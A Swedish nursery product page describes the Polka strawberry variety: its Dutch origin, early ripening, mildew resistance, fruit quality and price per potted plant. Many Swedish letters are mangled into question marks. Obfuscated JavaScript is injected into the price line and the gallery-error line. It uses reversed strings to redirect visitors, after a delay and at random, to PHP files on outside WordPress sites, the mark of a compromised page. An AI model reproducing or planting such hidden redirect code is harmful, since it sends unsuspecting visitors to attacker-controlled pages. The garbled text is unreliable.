Polka

  • Även om man inte tror det efter nam net kommer den fr?n Holland.
  • Ganska s? tidig (börjar mogna ungefär som Senga Sengaa, ca. 7-10 dagar efter Alba)
  • F?r mycket frukt (den f?r inte ha det för tort d? den växer och f?r frukt), enkel att odla, kylt?lig, attakeras ej av mjöldagg, kan drabbas av gr?mögel under fuktiga somrar (skydd föresl?ss)
  • Medelstora frukter, starkt röda och glansiga, väldigt goda med. Mycket aromat.
  • Kan användas till det mesta, passar som dessertjordgubbe men även i livsmedelsindustrin.
  • Utmärkt för s?väl stora odlingar som sm? trädg?rdar.

 

Köldt?liga
Smak
Attraktivitet av frukt
Prisvärdhet odling
Utbyte
Earliness Ganska s? tidig

Alla sorter säljs i krukor p? antingen 10 eller 40 stycken.

Nettopris: 1 PLN / styck (Artiss Currency Converter Error: Could not fetch one of the required exchange rates) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to=”SEK”] SEK / styck)

Kontakt och order

No images available in this Gallery Type. Please check admin setting.) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom=”YES”]